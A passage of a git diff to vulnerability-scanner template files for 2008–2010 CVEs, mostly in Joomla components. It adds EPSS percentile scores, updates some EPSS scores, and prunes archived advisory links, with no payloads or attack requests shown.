epss-score: 0.00329 cpe: cpe:2.3:a:appserv_open_project:appserv:*:*:*:*:*:*:*:* + epss-percentile: 0.67268 metadata: max-request: 1 vendor: appserv_open_project diff --git a/http/cves/2008/CVE-2008-2650.yaml b/http/cves/2008/CVE-2008-2650.yaml index 22c20eea92..93e9e2ef93 100644 --- a/http/cves/2008/CVE-2008-2650.yaml +++ b/http/cves/2008/CVE-2008-2650.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-22 epss-score: 0.06344 cpe: cpe:2.3:a:cmsimple:cmsimple:3.1:*:*:*:*:*:*:* + epss-percentile: 0.92723 metadata: max-request: 1 vendor: cmsimple diff --git a/http/cves/2008/CVE-2008-4668.yaml b/http/cves/2008/CVE-2008-4668.yaml index 1a768681fa..f4be6b963b 100644 --- a/http/cves/2008/CVE-2008-4668.yaml +++ b/http/cves/2008/CVE-2008-4668.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-22 epss-score: 0.01018 cpe: cpe:2.3:a:joomla:com_imagebrowser:0.1.5:*:*:*:*:*:*:* + epss-percentile: 0.819 metadata: max-request: 1 vendor: joomla diff --git a/http/cves/2008/CVE-2008-4764.yaml b/http/cves/2008/CVE-2008-4764.yaml index fc77b5f39e..f779f0c467 100644 --- a/http/cves/2008/CVE-2008-4764.yaml +++ b/http/cves/2008/CVE-2008-4764.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-22 epss-score: 0.00779 cpe: cpe:2.3:a:extplorer:com_extplorer:*:rc2:*:*:*:*:*:* + epss-percentile: 0.79142 metadata: max-request: 1 vendor: extplorer diff --git a/http/cves/2008/CVE-2008-5587.yaml b/http/cves/2008/CVE-2008-5587.yaml index 8d2bbdc149..cb3f00ca3f 100644 --- a/http/cves/2008/CVE-2008-5587.yaml +++ b/http/cves/2008/CVE-2008-5587.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-22 epss-score: 0.02331 cpe: cpe:2.3:a:phppgadmin:phppgadmin:*:*:*:*:*:*:*:* + epss-percentile: 0.88339 metadata: max-request: 1 shodan-query: http.title:"phpPgAdmin" diff --git a/http/cves/2008/CVE-2008-6080.yaml b/http/cves/2008/CVE-2008-6080.yaml index 16ef73ee8d..9b258f4b89 100644 --- a/http/cves/2008/CVE-2008-6080.yaml +++ b/http/cves/2008/CVE-2008-6080.yaml @@ -14,8 +14,9 @@ info: cvss-score: 5 cve-id: CVE-2008-6080 cwe-id: CWE-22 - epss-score: 0.00548 + epss-score: 0.00666 cpe: cpe:2.3:a:codecall:com_ionfiles:4.4.2:*:*:*:*:*:*:* + epss-percentile: 0.77115 metadata: max-request: 1 vendor: codecall diff --git a/http/cves/2008/CVE-2008-6172.yaml b/http/cves/2008/CVE-2008-6172.yaml index 296a03faed..f5a62ff742 100644 --- a/http/cves/2008/CVE-2008-6172.yaml +++ b/http/cves/2008/CVE-2008-6172.yaml @@ -14,8 +14,9 @@ info: cvss-score: 6.8 cve-id: CVE-2008-6172 cwe-id: CWE-22 - epss-score: 0.00367 + epss-score: 0.00447 cpe: cpe:2.3:a:weberr:rwcards:3.0.11:*:*:*:*:*:*:* + epss-percentile: 0.71823 metadata: max-request: 1 vendor: weberr diff --git a/http/cves/2008/CVE-2008-6222.yaml b/http/cves/2008/CVE-2008-6222.yaml index 65cc03071a..cd116f6329 100644 --- a/http/cves/2008/CVE-2008-6222.yaml +++ b/http/cves/2008/CVE-2008-6222.yaml @@ -14,8 +14,9 @@ info: cvss-score: 5 cve-id: CVE-2008-6222 cwe-id: CWE-22 - epss-score: 0.00684 + epss-score: 0.00832 cpe: cpe:2.3:a:joomlashowroom:pro_desk_support_center:1.0:*:*:*:*:*:*:* + epss-percentile: 0.79864 metadata: max-request: 1 vendor: joomlashowroom diff --git a/http/cves/2008/CVE-2008-6465.yaml b/http/cves/2008/CVE-2008-6465.yaml index defd3ee5c7..c5972dd42c 100644 --- a/http/cves/2008/CVE-2008-6465.yaml +++ b/http/cves/2008/CVE-2008-6465.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-79 epss-score: 0.00421 cpe: cpe:2.3:a:parallels:h-sphere:3.0.0:p9:*:*:*:*:*:* + epss-percentile: 0.70992 metadata: max-request: 1 verified: true diff --git a/http/cves/2008/CVE-2008-6668.yaml b/http/cves/2008/CVE-2008-6668.yaml index 6015b4e93e..bae7db8b1d 100644 --- a/http/cves/2008/CVE-2008-6668.yaml +++ b/http/cves/2008/CVE-2008-6668.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-22 epss-score: 0.00359 cpe: cpe:2.3:a:dirk_bartley:nweb2fax:*:*:*:*:*:*:*:* + epss-percentile: 0.68648 metadata: max-request: 2 vendor: dirk_bartley diff --git a/http/cves/2008/CVE-2008-6982.yaml b/http/cves/2008/CVE-2008-6982.yaml index e7c725f794..c145905ac5 100644 --- a/http/cves/2008/CVE-2008-6982.yaml +++ b/http/cves/2008/CVE-2008-6982.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-79 epss-score: 0.0038 cpe: cpe:2.3:a:devalcms:devalcms:1.4a:*:*:*:*:*:*:* + epss-percentile: 0.69519 metadata: max-request: 1 verified: true diff --git a/http/cves/2008/CVE-2008-7269.yaml b/http/cves/2008/CVE-2008-7269.yaml index 2a8fc8c9c3..b6eca282e8 100644 --- a/http/cves/2008/CVE-2008-7269.yaml +++ b/http/cves/2008/CVE-2008-7269.yaml @@ -14,8 +14,9 @@ info: cvss-score: 5.8 cve-id: CVE-2008-7269 cwe-id: CWE-20 - epss-score: 0.03645 + epss-score: 0.01358 cpe: cpe:2.3:a:boka:siteengine:5.0:*:*:*:*:*:*:* + epss-percentile: 0.84524 metadata: max-request: 1 shodan-query: html:"SiteEngine" diff --git a/http/cves/2009/CVE-2009-0347.yaml b/http/cves/2009/CVE-2009-0347.yaml index dfce9670b5..f1add98dc1 100644 --- a/http/cves/2009/CVE-2009-0347.yaml +++ b/http/cves/2009/CVE-2009-0347.yaml @@ -17,8 +17,9 @@ info: cvss-score: 5.8 cve-id: CVE-2009-0347 cwe-id: CWE-59 - epss-score: 0.08272 + epss-score: 0.09851 cpe: cpe:2.3:a:autonomy:ultraseek:_nil_:*:*:*:*:*:*:* + epss-percentile: 0.94077 metadata: max-request: 1 vendor: autonomy diff --git a/http/cves/2009/CVE-2009-0545.yaml b/http/cves/2009/CVE-2009-0545.yaml index ba3b74a6ea..52a6e5fe70 100644 --- a/http/cves/2009/CVE-2009-0545.yaml +++ b/http/cves/2009/CVE-2009-0545.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-20 epss-score: 0.9719 cpe: cpe:2.3:a:zeroshell:zeroshell:1.0:beta1:*:*:*:*:*:* + epss-percentile: 0.99722 metadata: max-request: 1 vendor: zeroshell diff --git a/http/cves/2009/CVE-2009-0932.yaml b/http/cves/2009/CVE-2009-0932.yaml index 14eae6c598..4a287f995e 100644 --- a/http/cves/2009/CVE-2009-0932.yaml +++ b/http/cves/2009/CVE-2009-0932.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-22 epss-score: 0.04048 cpe: cpe:2.3:a:debian:horde:3.2:*:*:*:*:*:*:* + epss-percentile: 0.9095 metadata: max-request: 1 vendor: debian diff --git a/http/cves/2009/CVE-2009-1151.yaml b/http/cves/2009/CVE-2009-1151.yaml index 7aa75206ad..b8fda8bbff 100644 --- a/http/cves/2009/CVE-2009-1151.yaml +++ b/http/cves/2009/CVE-2009-1151.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-94 epss-score: 0.79256 cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:* + epss-percentile: 0.9785 metadata: max-request: 1 vendor: phpmyadmin diff --git a/http/cves/2009/CVE-2009-1496.yaml b/http/cves/2009/CVE-2009-1496.yaml index 7529af81a6..2a28afbc6c 100644 --- a/http/cves/2009/CVE-2009-1496.yaml +++ b/http/cves/2009/CVE-2009-1496.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-22 epss-score: 0.00533 cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:* + epss-percentile: 0.7415 metadata: max-request: 1 vendor: joomla diff --git a/http/cves/2009/CVE-2009-1558.yaml b/http/cves/2009/CVE-2009-1558.yaml index 1252fd6466..26800f31ff 100644 --- a/http/cves/2009/CVE-2009-1558.yaml +++ b/http/cves/2009/CVE-2009-1558.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-22 epss-score: 0.00901 cpe: cpe:2.3:h:cisco:wvc54gca:1.00r22:*:*:*:*:*:*:* + epss-percentile: 0.80705 metadata: max-request: 1 vendor: cisco diff --git a/http/cves/2009/CVE-2009-1872.yaml b/http/cves/2009/CVE-2009-1872.yaml index 7d94fa369a..8d7ce456af 100644 --- a/http/cves/2009/CVE-2009-1872.yaml +++ b/http/cves/2009/CVE-2009-1872.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.3657 cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:* + epss-percentile: 0.96635 metadata: max-request: 1 shodan-query: http.component:"Adobe ColdFusion" diff --git a/http/cves/2009/CVE-2009-2015.yaml b/http/cves/2009/CVE-2009-2015.yaml index 6b84b86d27..6d39f72fa9 100644 --- a/http/cves/2009/CVE-2009-2015.yaml +++ b/http/cves/2009/CVE-2009-2015.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-22 epss-score: 0.00813 cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:* + epss-percentile: 0.79614 metadata: max-request: 1 vendor: joomla diff --git a/http/cves/2009/CVE-2009-2100.yaml b/http/cves/2009/CVE-2009-2100.yaml index 1c3fa42ae0..7fa974b22c 100644 --- a/http/cves/2009/CVE-2009-2100.yaml +++ b/http/cves/2009/CVE-2009-2100.yaml @@ -15,6 +15,7 @@ info: cwe-id: CWE-22 epss-score: 0.00528 cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:* + epss-percentile: 0.74045 metadata: max-request: 1 vendor: joomla diff --git a/http/cves/2009/CVE-2009-3053.yaml b/http/cves/2009/CVE-2009-3053.yaml index 41261d1df7..1652ecc119 100644 --- a/http/cves/2009/CVE-2009-3053.yaml +++ b/http/cves/2009/CVE-2009-3053.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-22 epss-score: 0.00367 cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:* + epss-percentile: 0.69025 metadata: max-request: 1 vendor: joomla diff --git a/http/cves/2009/CVE-2009-3318.yaml b/http/cves/2009/CVE-2009-3318.yaml index 69a50e0646..c4a7650b54 100644 --- a/http/cves/2009/CVE-2009-3318.yaml +++ b/http/cves/2009/CVE-2009-3318.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-22 epss-score: 0.00706 cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:* + epss-percentile: 0.77913 metadata: max-request: 1 vendor: joomla diff --git a/http/cves/2009/CVE-2009-4202.yaml b/http/cves/2009/CVE-2009-4202.yaml index a0fca2b616..e1016994ea 100644 --- a/http/cves/2009/CVE-2009-4202.yaml +++ b/http/cves/2009/CVE-2009-4202.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-22 epss-score: 0.01956 cpe: cpe:2.3:a:joomla:joomla\!:*:*:*:*:*:*:*:* + epss-percentile: 0.87217 metadata: max-request: 1 vendor: joomla diff --git a/http/cves/2009/CVE-2009-4223.yaml b/http/cves/2009/CVE-2009-4223.yaml index 72142f903b..5052031710 100644 --- a/http/cves/2009/CVE-2009-4223.yaml +++ b/http/cves/2009/CVE-2009-4223.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-94 epss-score: 0.01041 cpe: cpe:2.3:a:gianni_tommasi:kr-php_web_content_server:*:beta_2:*:*:*:*:*:* + epss-percentile: 0.82106 metadata: max-request: 1 vendor: gianni_tommasi diff --git a/http/cves/2009/CVE-2009-4679.yaml b/http/cves/2009/CVE-2009-4679.yaml index db07ceb35c..5104703c40 100644 --- a/http/cves/2009/CVE-2009-4679.yaml +++ b/http/cves/2009/CVE-2009-4679.yaml @@ -9,7 +9,6 @@ info: reference: - https://www.exploit-db.com/exploits/33440 - https://nvd.nist.gov/vuln/detail/CVE-2009-4679 - - http://web.archive.org/web/20140722130146/http://secunia.com/advisories/37760/ - http://www.exploit-db.com/exploits/10754 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P @@ -18,6 +17,7 @@ info: cwe-id: CWE-22 epss-score: 0.00826 cpe: cpe:2.3:a:inertialfate:com_if_nexus:1.5:*:*:*:*:*:*:* + epss-percentile: 0.79783 metadata: max-request: 1 vendor: inertialfate diff --git a/http/cves/2009/CVE-2009-5020.yaml b/http/cves/2009/CVE-2009-5020.yaml index b544b386e4..ee6ca70805 100644 --- a/http/cves/2009/CVE-2009-5020.yaml +++ b/http/cves/2009/CVE-2009-5020.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-20 epss-score: 0.00215 cpe: cpe:2.3:a:awstats:awstats:*:*:*:*:*:*:*:* + epss-percentile: 0.58808 metadata: max-request: 2 vendor: awstats diff --git a/http/cves/2009/CVE-2009-5114.yaml b/http/cves/2009/CVE-2009-5114.yaml index 94bc2f0b89..c4ce006a35 100644 --- a/http/cves/2009/CVE-2009-5114.yaml +++ b/http/cves/2009/CVE-2009-5114.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-22 epss-score: 0.03309 cpe: cpe:2.3:a:iwork:webglimpse:*:*:*:*:*:*:*:* + epss-percentile: 0.90068 metadata: max-request: 1 vendor: iwork diff --git a/http/cves/2010/CVE-2010-0157.yaml b/http/cves/2010/CVE-2010-0157.yaml index 3a946db7fa..eda20a81c4 100644 --- a/http/cves/2010/CVE-2010-0157.yaml +++ b/http/cves/2010/CVE-2010-0157.yaml @@ -8,7 +8,6 @@ info: reference: - https://www.exploit-db.com/exploits/10943 - https://nvd.nist.gov/vuln/detail/CVE-2010-0157 - - http://web.archive.org/web/20151023032409/http://secunia.com/advisories/37896/ - http://packetstormsecurity.org/1001-exploits/joomlabiblestudy-lfi.txt remediation: Upgrade to a supported version. classification: @@ -18,6 +17,7 @@ info: cwe-id: CWE-22 epss-score: 0.00826 cpe: cpe:2.3:a:joomla:joomla\!:*:*:*:*:*:*:*:* + epss-percentile: 0.79783 metadata: max-request: 1 vendor: joomla diff --git a/http/cves/2010/CVE-2010-0219.yaml b/http/cves/2010/CVE-2010-0219.yaml index ae453080bf..6f0a9bd55e 100644 --- a/http/cves/2010/CVE-2010-0219.yaml +++ b/http/cves/2010/CVE-2010-0219.yaml @@ -16,8 +16,9 @@ info: cvss-score: 10 cve-id: CVE-2010-0219 cwe-id: CWE-255 - epss-score: 0.97497 + epss-score: 0.97513 cpe: cpe:2.3:a:apache:axis2:1.3:*:*:*:*:*:*:* + epss-percentile: 0.99971 metadata: max-request: 2 shodan-query: http.html:"Apache Axis" diff --git a/http/cves/2010/CVE-2010-0467.yaml b/http/cves/2010/CVE-2010-0467.yaml index ef613e1a62..bcd75ba059 100644 --- a/http/cves/2010/CVE-2010-0467.yaml +++ b/http/cves/2010/CVE-2010-0467.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-22 epss-score: 0.0586 cpe: cpe:2.3:a:chillcreations:com_ccnewsletter:1.0.5:*:*:*:*:*:*:* + epss-percentile: 0.92444 metadata: max-request: 1 vendor: chillcreations diff --git a/http/cves/2010/CVE-2010-0696.yaml b/http/cves/2010/CVE-2010-0696.yaml index 87dc67e493..28e76eca65 100644 --- a/http/cves/2010/CVE-2010-0696.yaml +++ b/http/cves/2010/CVE-2010-0696.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-22 epss-score: 0.79015 cpe: cpe:2.3:a:joomlaworks:jw_allvideos:3.0:*:*:*:*:*:*:* + epss-percentile: 0.97844 metadata: max-request: 1 vendor: joomlaworks diff --git a/http/cves/2010/CVE-2010-0759.yaml b/http/cves/2010/CVE-2010-0759.yaml index 68d8a5149c..ab8215fc97 100644 --- a/http/cves/2010/CVE-2010-0759.yaml +++ b/http/cves/2010/CVE-2010-0759.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-22 epss-score: 0.01326 cpe: cpe:2.3:a:greatjoomla:scriptegrator_plugin:1.4.1:*:*:*:*:*:*:* + epss-percentile: 0.84334 metadata: max-request: 1 vendor: greatjoomla diff --git a/http/cves/2010/CVE-2010-0942.yaml b/http/cves/2010/CVE-2010-0942.yaml index 3ae5c45be1..b85b9eb83a 100644 --- a/http/cves/2010/CVE-2010-0942.yaml +++ b/http/cves/2010/CVE-2010-0942.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-22 epss-score: 0.00477 cpe: cpe:2.3:a:jvideodirect:com_jvideodirect:*:*:*:*:*:*:*:* + epss-percentile: 0.72681 metadata: max-request: 1 vendor: jvideodirect diff --git a/http/cves/2010/CVE-2010-0943.yaml b/http/cves/2010/CVE-2010-0943.yaml index deed2da1ad..b7b1f53746 100644 --- a/http/cves/2010/CVE-2010-0943.yaml +++ b/http/cves/2010/CVE-2010-0943.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-22 epss-score: 0.01155 cpe: cpe:2.3:a:joomlart:com_jashowcase:*:*:*:*:*:*:*:* + epss-percentile: 0.8306 metadata: max-request: 1 vendor: joomlart diff --git a/http/cves/2010/CVE-2010-0944.yaml b/http/cves/2010/CVE-2010-0944.yaml index b021b60f4d..8d90247b5c 100644 --- a/http/cves/2010/CVE-2010-0944.yaml +++ b/http/cves/2010/CVE-2010-0944.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-22 epss-score: 0.00477 cpe: cpe:2.3:a:thorsten_riess:com_jcollection:*:*:*:*:*:*:*:* + epss-percentile: 0.72681 metadata: max-request: 1 vendor: thorsten_riess diff --git a/http/cves/2010/CVE-2010-0972.yaml b/http/cves/2010/CVE-2010-0972.yaml index e984dbb1c8..4ac36c9526 100644 --- a/http/cves/2010/CVE-2010-0972.yaml +++ b/http/cves/2010/CVE-2010-0972.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-22 epss-score: 0.00813 cpe: cpe:2.3:a:g4j.laoneo:com_gcalendar:2.1.5:*:*:*:*:*:*:* + epss-percentile: 0.79614 metadata: max-request: 1 vendor: g4j.laoneo diff --git a/http/cves/2010/CVE-2010-0982.yaml b/http/cves/2010/CVE-2010-0982.yaml index 5924a8783f..b1a147a542 100644 --- a/http/cves/2010/CVE-2010-0982.yaml +++ b/http/cves/2010/CVE-2010-0982.yaml @@ -8,8 +8,6 @@ info: reference: - https://www.exploit-db.com/exploits/10942 - https://nvd.nist.gov/vuln/detail/CVE-2010-0982 - - http://web.archive.org/web/20210121193625/https://www.securityfocus.com/bid/37581/ - - http://web.archive.org/web/20151104182451/http://secunia.com/advisories/37917/ remediation: Apply all relevant security patches and product upgrades. classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:N/A:N @@ -18,6 +16,7 @@ info: cwe-id: CWE-22 epss-score: 0.0087 cpe: cpe:2.3:a:joomlamo:com_cartweberp:1.56.75:*:*:*:*:*:*:* + epss-percentile: 0.80286 metadata: max-request: 1 vendor: joomlamo diff --git a/http/cves/2010/CVE-2010-0985.yaml b/http/cves/2010/CVE-2010-0985.yaml index 28ef19e752..59f6badc38 100644 --- a/http/cves/2010/CVE-2010-0985.yaml +++ b/http/cves/2010/CVE-2010-0985.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-22 epss-score: 0.01222 cpe: cpe:2.3:a:chris_simon:com_abbrev:1.1:*:*:*:*:*:*:* + epss-percentile: 0.83609 metadata: max-request: 1 vendor: chris_simon diff --git a/http/cves/2010/CVE-2010-1056.yaml b/http/cves/2010/CVE-2010-1056.yaml index 170dbc29c1..ac622ba08b 100644 --- a/http/cves/2010/CVE-2010-1056.yaml +++ b/http/cves/2010/CVE-2010-1056.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-22 epss-score: 0.06484 cpe: cpe:2.3:a:rockettheme:com_rokdownloads:*:*:*:*:*:*:*:* + epss-percentile: 0.92801 metadata: max-request: 1 vendor: rockettheme diff --git a/http/cves/2010/CVE-2010-1081.yaml b/http/cves/2010/CVE-2010-1081.yaml index 527b35c0d2..ff16e60b4a 100644 --- a/http/cves/2010/CVE-2010-1081.yaml +++ b/http/cves/2010/CVE-2010-1081.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-22 epss-score: 0.02282 cpe: cpe:2.3:a:corejoomla:com_communitypolls:*:*:*:*:*:*:*:* + epss-percentile: 0.88237 metadata: max-request: 1 vendor: corejoomla diff --git a/http/cves/2010/CVE-2010-1217.yaml b/http/cves/2010/CVE-2010-1217.yaml index b7833be0f6..0d5e24027d 100644 --- a/http/cves/2010/CVE-2010-1217.yaml +++ b/http/cves/2010/CVE-2010-1217.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-22 epss-score: 0.01155 cpe: cpe:2.3:a:je_form_creator:je_form_creator:*:*:*:*:*:*:*:* + epss-percentile: 0.8306 metadata: max-request: 1 vendor: je_form_creator diff --git a/http/cves/2010/CVE-2010-1219.yaml b/http/cves/2010/CVE-2010-1219.yaml index 78bef0b5cb..0d53aecfd1 100644 --- a/http/cves/2010/CVE-2010-1219.yaml +++ b/http/cves/2010/CVE-2010-1219.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-22 epss-score: 0.00813 cpe: cpe:2.3:a:com_janews:com_janews:1.0:*:*:*:*:*:*:* + epss-percentile: 0.79614 metadata: max-request: 1 vendor: com_janews diff --git a/http/cves/2010/CVE-2010-1302.yaml b/http/cves/2010/CVE-2010-1302.yaml index fdac5d99dc..6042d130fb 100644 --- a/http/cves/2010/CVE-2010-1302.yaml +++ b/http/cves/2010/CVE-2010-1302.yaml @@ -8,8 +8,6 @@ info: reference: - https://www.exploit-db.com/exploits/11978 - https://nvd.nist.gov/vuln/detail/CVE-2010-1302 - - http://web.archive.org/web/20210121195144/https://www.securityfocus.com/bid/39108/ - - http://web.archive.org/web/20140805062036/http://secunia.com/advisories/39200/ remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N @@ -18,6 +16,7 @@ info: cwe-id: CWE-22 epss-score: 0.01204 cpe: cpe:2.3:a:decryptweb:com_dwgraphs:1.0:*:*:*:*:*:*:* + epss-percentile: 0.83479 metadata: max-request: 1 vendor: decryptweb diff --git a/http/cves/2010/CVE-2010-1304.yaml b/http/cves/2010/CVE-2010-1304.yaml index 64a95367bf..2a74ba40c0 100644 --- a/http/cves/2010/CVE-2010-1304.yaml +++ b/http/cves/2010/CVE-2010-1304.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-22 epss-score: 0.0045 cpe: cpe:2.3:a:joomlamo:com_userstatus:1.21.16:*:*:*:*:*:*:* + epss-percentile: 0.71928 metadata: max-request: 1 vendor: joomlamo diff --git a/http/cves/2010/CVE-2010-1305.yaml b/http/cves/2010/CVE-2010-1305.yaml index 425d3d289c..834fd8fc16 100644 --- a/http/cves/2010/CVE-2010-1305.yaml +++ b/http/cves/2010/CVE-2010-1305.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-22 epss-score: 0.03203 cpe: cpe:2.3:a:joomlamo:com_jinventory:1.23.02:*:*:*:*:*:*:* + epss-percentile: 0.89919 metadata: max-request: 1 vendor: joomlamo diff --git a/http/cves/2010/CVE-2010-1306.yaml b/http/cves/2010/CVE-2010-1306.yaml index 011e567332..43ddb17e35 100644 --- a/http/cves/2010/CVE-2010-1306.yaml +++ b/http/cves/2010/CVE-2010-1306.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-22 epss-score: 0.01242 cpe: cpe:2.3:a:roberto_aloi:com_joomlapicasa2:2.0.0:*:*:*:*:*:*:* + epss-percentile: 0.83796 metadata: max-request: 1 vendor: roberto_aloi diff --git a/http/cves/2010/CVE-2010-1307.yaml b/http/cves/2010/CVE-2010-1307.yaml index c080141c9e..364695dd94 100644 --- a/http/cves/2010/CVE-2010-1307.yaml +++ b/http/cves/2010/CVE-2010-1307.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-22 epss-score: 0.01751 cpe: cpe:2.3:a:software.realtyna:com_joomlaupdater:1.0:*:*:*:*:*:*:* + epss-percentile: 0.86395 metadata: max-request: 1 vendor: software.realtyna diff --git a/http/cves/2010/CVE-2010-1308.yaml b/http/cves/2010/CVE-2010-1308.yaml index 2b15bb83e4..df94e58133 100644 --- a/http/cves/2010/CVE-2010-1308.yaml +++ b/http/cves/2010/CVE-2010-1308.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-22 epss-score: 0.01334 cpe: cpe:2.3:a:la-souris-verte:com_svmap:1.1.1:*:*:*:*:*:*:* + epss-percentile: 0.84366 metadata: max-request: 1 vendor: la-souris-verte diff --git a/http/cves/2010/CVE-2010-1312.yaml b/http/cves/2010/CVE-2010-1312.yaml index 83ac573be6..7dbcb66435 100644 --- a/http/cves/2010/CVE-2010-1312.yaml +++ b/http/cves/2010/CVE-2010-1312.yaml @@ -8,7 +8,6 @@ info: reference: - https://www.exploit-db.com/exploits/12077 - https://nvd.nist.gov/vuln/detail/CVE-2010-1312 - - http://web.archive.org/web/20140724200344/http://secunia.com/advisories/39289/ - http://packetstormsecurity.org/1004-exploits/joomlanewportal-lfi.txt remediation: Upgrade to a supported version. classification: @@ -18,6 +17,7 @@ info: cwe-id: CWE-22 epss-score: 0.01155 cpe: cpe:2.3:a:ijoomla:com_news_portal:1.5.1:*:*:*:*:*:*:* + epss-percentile: 0.8306 metadata: max-request: 1 vendor: ijoomla diff --git a/http/cves/2010/CVE-2010-1313.yaml b/http/cves/2010/CVE-2010-1313.yaml index f0ef6c2a34..42dfb4018b 100644 --- a/http/cves/2010/CVE-2010-1313.yaml +++ b/http/cves/2010/CVE-2010-1313.yaml @@ -8,7 +8,6 @@ info: reference: - https://www.exploit-db.com/exploits/12082 - https://nvd.nist.gov/vuln/detail/CVE-2010-1313 - - http://web.archive.org/web/20210121195302/https://www.securityfocus.com/bid/39237/ - http://www.exploit-db.com/exploits/12082 remediation: Upgrade to a supported version. classification: @@ -18,6 +17,7 @@ info: cwe-id: CWE-22 epss-score: 0.0045 cpe: cpe:2.3:a:seber:com_sebercart:1.0.0.12:*:*:*:*:*:*:* + epss-percentile: 0.71928 metadata: max-request: 1 vendor: seber diff --git a/http/cves/2010/CVE-2010-1314.yaml b/http/cves/2010/CVE-2010-1314.yaml index cc92a0b209..b74928bff0 100644 --- a/http/cves/2010/CVE-2010-1314.yaml +++ b/http/cves/2010/CVE-2010-1314.yaml @@ -8,7 +8,6 @@ info: reference: - https://www.exploit-db.com/exploits/12086 - https://nvd.nist.gov/vuln/detail/CVE-2010-1314 - - http://web.archive.org/web/20140724203458/http://secunia.com/advisories/39359/ - http://packetstormsecurity.org/1004-exploits/joomlahsconfig-lfi.txt remediation: Upgrade to a supported version. classification: @@ -18,6 +17,7 @@ info: cwe-id: CWE-22 epss-score: 0.00477 cpe: cpe:2.3:a:joomlanook:com_hsconfig:1.5:*:*:*:*:*:*:* + epss-percentile: 0.72681 metadata: max-request: 1 vendor: joomlanook diff --git a/http/cves/2010/CVE-2010-1315.yaml b/http/cves/2010/CVE-2010-1315.yaml index 8c951f9e6f..356f274fdb 100644 --- a/http/cves/2010/CVE-2010-1315.yaml +++ b/http/cves/2010/CVE-2010-1315.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-22 epss-score: 0.0087 cpe: cpe:2.3:a:joomlamo:com_weberpcustomer:1.2.1:*:*:*:*:*:*:* + epss-percentile: 0.80286 metadata: max-request: 1 vendor: joomlamo diff --git a/http/cves/2010/CVE-2010-1340.yaml b/http/cves/2010/CVE-2010-1340.yaml index eb4aa14aa1..d6e3c28d00 100644 --- a/http/cves/2010/CVE-2010-1340.yaml +++ b/http/cves/2010/CVE-2010-1340.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-22 epss-score: 0.01155 cpe: cpe:2.3:a:joomla-research:com_jresearch:*:*:*:*:*:*:*:* + epss-percentile: 0.8306 metadata: max-request: 1 vendor: joomla-research diff --git a/http/cves/2010/CVE-2010-1345.yaml b/http/cves/2010/CVE-2010-1345.yaml index bb173a095e..468389f448 100644 --- a/http/cves/2010/CVE-2010-1345.yaml +++ b/http/cves/2010/CVE-2010-1345.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-22 epss-score: 0.00477 cpe: cpe:2.3:a:cookex:com_ckforms:1.3.3:*:*:*:*:*:*:* + epss-percentile: 0.72681 metadata: max-request: 1 vendor: cookex diff --git a/http/cves/2010/CVE-2010-1352.yaml b/http/cves/2010/CVE-2010-1352.yaml index 7dd39e516c..53aff88ca4 100644 --- a/http/cves/2010/CVE-2010-1352.yaml +++ b/http/cves/2010/CVE-2010-1352.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-22 epss-score: 0.00477 cpe: cpe:2.3:a:jooforge:com_jukebox:1.0:*:*:*:*:*:*:* + epss-percentile: 0.72681 metadata: max-request: 1 vendor: jooforge diff --git a/http/cves/2010/CVE-2010-1353.yaml b/http/cves/2010/CVE-2010-1353.yaml index f23ad6a672..4ac76de77b 100644 --- a/http/cves/2010/CVE-2010-1353.yaml +++ b/http/cves/2010/CVE-2010-1353.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-22 epss-score: 0.01751 cpe: cpe:2.3:a:wowjoomla:com_loginbox:*:*:*:*:*:*:*:* + epss-percentile: 0.86395 metadata: max-request: 1 vendor: wowjoomla diff --git 